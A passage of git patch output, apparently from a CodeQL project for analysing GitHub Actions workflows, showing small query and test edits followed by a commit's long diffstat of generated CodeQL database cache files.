 predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) {
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql
index 5ac0c299929..4f710a16e8f 100644
--- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql
+++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql
@@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
- exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr())
+ exists(ReusableWorkflow w | w.getAnInput() = source.asExpr())
 }
 predicate isSink(DataFlow::Node sink) {
- exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr())
+ exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr())
 }
 }
diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql
index 7524e31f050..abdd087590a 100644
--- a/ql/test/library-tests/test.ql
+++ b/ql/test/library-tests/test.ql
@@ -29,13 +29,9 @@ query predicate runStepChildren(Run run, AstNode child) { child.getParentNode()
 query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
-query predicate cfgNodes(Cfg::Node n) {
- n.getLocation().getFile().getBaseName() = "argus_case_study.yml"
-} //any() }
+query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() }
-query predicate dfNodes(DataFlow::Node e) {
- e.getLocation().getFile().getBaseName() = "argus_case_study.yml"
-} //any() }
+query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() }
 query predicate exprNodes(DataFlow::Node e) { any() }
From 1c2f19f4e168b846508f76937118f6c94a245eca Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 16:06:06 +0100 Subject: [PATCH 0083/1267] Merge Actions.qll and Ast.qll --- clean.sh | 2 + db/baseline-info.json | 1 + db/codeql-database.yml | 10 + db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 216 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 320 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 216 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 6312 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 0 -> 3200 bytes 
...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 0 -> 896 bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 0 -> 12 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 0 -> 152 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 0 -> 12 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 0 -> 116 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 0 -> 12 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 0 -> 88 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 0 -> 2216 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 0 -> 104 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 0 -> 104 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes 
...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 280 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 0 -> 16 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 0 -> 104 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2216 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 0 -> 16 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes 
db/db-yaml/default/cache/pages/01.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/01.pack.d | Bin 0 -> 844 bytes db/db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes db/db-yaml/default/cache/pages/08.pack | Bin 0 -> 87 bytes db/db-yaml/default/cache/pages/09.pack | Bin 0 -> 167 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 0 -> 2341 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 0 -> 292 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/17.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 0 -> 5326 bytes db/db-yaml/default/cache/pages/20.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 0 -> 574 bytes db/db-yaml/default/cache/pages/24.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 0 -> 6318 bytes db/db-yaml/default/cache/pages/26.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 0 -> 294 bytes db/db-yaml/default/cache/pages/27.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 0 -> 1493 bytes db/db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/33.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/33.pack.d | Bin 0 -> 393 bytes db/db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 106 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 0 -> 916 bytes db/db-yaml/default/cache/pages/42.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 0 -> 5053 bytes db/db-yaml/default/cache/pages/45.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 0 -> 6001 bytes db/db-yaml/default/cache/pages/46.pack | Bin 0 -> 111 bytes 
db/db-yaml/default/cache/pages/4c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4c.pack.d | Bin 0 -> 302 bytes db/db-yaml/default/cache/pages/4d.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 0 -> 3292 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 0 -> 1048 bytes db/db-yaml/default/cache/pages/54.pack | Bin 0 -> 320 bytes db/db-yaml/default/cache/pages/55.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 0 -> 221 bytes db/db-yaml/default/cache/pages/62.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 0 -> 179 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 0 -> 1695 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 0 -> 1284 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 0 -> 151 bytes db/db-yaml/default/cache/pages/84.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/84.pack.d | Bin 0 -> 3788 bytes db/db-yaml/default/cache/pages/88.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/88.pack.d | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/93.pack | Bin 0 -> 113 bytes db/db-yaml/default/cache/pages/96.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/96.pack.d | Bin 0 -> 1651 bytes db/db-yaml/default/cache/pages/9e.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/9e.pack.d | Bin 0 -> 1899 bytes db/db-yaml/default/cache/pages/a1.pack | Bin 0 -> 111 bytes db/db-yaml/default/cache/pages/a3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 5502 bytes db/db-yaml/default/cache/pages/aa.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/aa.pack.d | Bin 0 -> 570 bytes db/db-yaml/default/cache/pages/b5.pack | Bin 0 -> 89 bytes db/db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes 
db/db-yaml/default/cache/pages/c2.pack | Bin 0 -> 97 bytes db/db-yaml/default/cache/pages/d0.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d0.pack.d | Bin 0 -> 5185 bytes db/db-yaml/default/cache/pages/d5.pack | Bin 0 -> 118 bytes db/db-yaml/default/cache/pages/d6.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/d6.pack.d | Bin 0 -> 1767 bytes db/db-yaml/default/cache/pages/d7.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d7.pack.d | Bin 0 -> 427 bytes db/db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes db/db-yaml/default/cache/pages/e1.pack | Bin 0 -> 96 bytes db/db-yaml/default/cache/pages/e9.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/e9.pack.d | Bin 0 -> 101 bytes db/db-yaml/default/cache/pages/f3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/f3.pack.d | Bin 0 -> 3380 bytes db/db-yaml/default/cache/pages/f6.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/fc.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/pages/fc.pack.d | Bin 0 -> 483 bytes db/db-yaml/default/cache/pages/fd.pack | Bin 0 -> 134 bytes db/db-yaml/default/cache/predicates/00.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/01.pack | Bin 0 -> 219 bytes db/db-yaml/default/cache/predicates/02.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/04.pack | Bin 0 -> 493 bytes db/db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes db/db-yaml/default/cache/predicates/07.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/08.pack | Bin 0 -> 338 bytes db/db-yaml/default/cache/predicates/09.pack | Bin 0 -> 558 bytes db/db-yaml/default/cache/predicates/18.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/1b.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/1c.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 341 bytes db/db-yaml/default/cache/predicates/22.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/24.pack | Bin 0 -> 218 bytes 
db/db-yaml/default/cache/predicates/25.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/27.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/28.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/29.pack | Bin 0 -> 216 bytes db/db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes db/db-yaml/default/cache/predicates/32.pack | Bin 0 -> 409 bytes db/db-yaml/default/cache/predicates/3a.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 413 bytes db/db-yaml/default/cache/predicates/42.pack | Bin 0 -> 546 bytes db/db-yaml/default/cache/predicates/48.pack | Bin 0 -> 343 bytes db/db-yaml/default/cache/predicates/49.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/4c.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/4e.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/55.pack | Bin 0 -> 145 bytes db/db-yaml/default/cache/predicates/57.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/58.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/59.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 655 bytes db/db-yaml/default/cache/predicates/5f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/60.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/62.pack | Bin 0 -> 419 bytes db/db-yaml/default/cache/predicates/65.pack | Bin 0 -> 357 bytes db/db-yaml/default/cache/predicates/68.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/69.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/72.pack | Bin 
0 -> 219 bytes db/db-yaml/default/cache/predicates/73.pack | Bin 0 -> 299 bytes db/db-yaml/default/cache/predicates/74.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes db/db-yaml/default/cache/predicates/77.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7a.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/7d.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/82.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/86.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/87.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/88.pack | Bin 0 -> 291 bytes db/db-yaml/default/cache/predicates/89.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 231 bytes db/db-yaml/default/cache/predicates/8f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/91.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/95.pack | Bin 0 -> 415 bytes db/db-yaml/default/cache/predicates/97.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/98.pack | Bin 0 -> 414 bytes db/db-yaml/default/cache/predicates/99.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/9c.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9d.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 468 bytes db/db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/a4.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/aa.pack | Bin 0 -> 161 bytes 
db/db-yaml/default/cache/predicates/ad.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/ae.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/b0.pack | Bin 0 -> 568 bytes db/db-yaml/default/cache/predicates/b2.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/b5.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/b8.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes db/db-yaml/default/cache/predicates/c1.pack | Bin 0 -> 217 bytes db/db-yaml/default/cache/predicates/c4.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes db/db-yaml/default/cache/predicates/cb.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/cc.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/cd.pack | Bin 0 -> 352 bytes db/db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes db/db-yaml/default/cache/predicates/d8.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/df.pack | Bin 0 -> 499 bytes db/db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 353 bytes db/db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 344 bytes db/db-yaml/default/cache/predicates/e6.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/ec.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/ed.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/ee.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/f0.pack | Bin 0 -> 276 bytes db/db-yaml/default/cache/predicates/f2.pack | Bin 0 -> 411 bytes db/db-yaml/default/cache/predicates/f3.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/f6.pack | Bin 0 -> 491 bytes db/db-yaml/default/cache/predicates/f7.pack | Bin 
0 -> 217 bytes db/db-yaml/default/cache/predicates/fa.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/fb.pack | Bin 0 -> 215 bytes db/db-yaml/default/cache/predicates/fc.pack | Bin 0 -> 263 bytes db/db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes db/db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/0a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/0c.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/12.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/13.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/14.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1d.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/22.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/2b.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/32.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/35.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/5a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/60.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/65.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/6e.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/71.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/73.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/76.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/78.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/81.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/86.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/8a.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/92.pack | Bin 0 -> 126 
bytes db/db-yaml/default/cache/relations/9a.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/9d.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/relations/a9.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/aa.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes db/db-yaml/default/cache/relations/b3.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/b4.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/b6.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/b8.pack | Bin 0 -> 435 bytes db/db-yaml/default/cache/relations/bf.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/c4.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/c7.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/cd.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d1.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d6.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/dc.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/e3.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/ee.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/f1.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f7.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f9.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/fd.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/version | 1 + db/db-yaml/default/containerparent.rel | Bin 0 -> 328 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/files.rel | Bin 0 -> 208 bytes db/db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/folders.rel | Bin 0 -> 128 bytes db/db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/locations_default.rel | Bin 0 -> 33384 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes 
db/db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes db/db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/pools/0/pageDump/page-000000000 | 55 +++ db/db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes db/db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes db/db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes db/db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/strings/0/pageDump/page-000000000 | 2 + db/db-yaml/default/yaml.rel | Bin 0 -> 33384 bytes db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_locations.rel | Bin 0 -> 11128 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 12540 bytes db/db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240301T120559.348Z.json | 0 ...-diagnostics-add-20240301T120600.004Z.json | 0 .../database-create-20240301.130558.279.log | 321 ++++++++++++++ ...tabase-index-files-20240301.130558.974.log | 44 ++ db/src.zip | Bin 0 -> 20479 bytes 
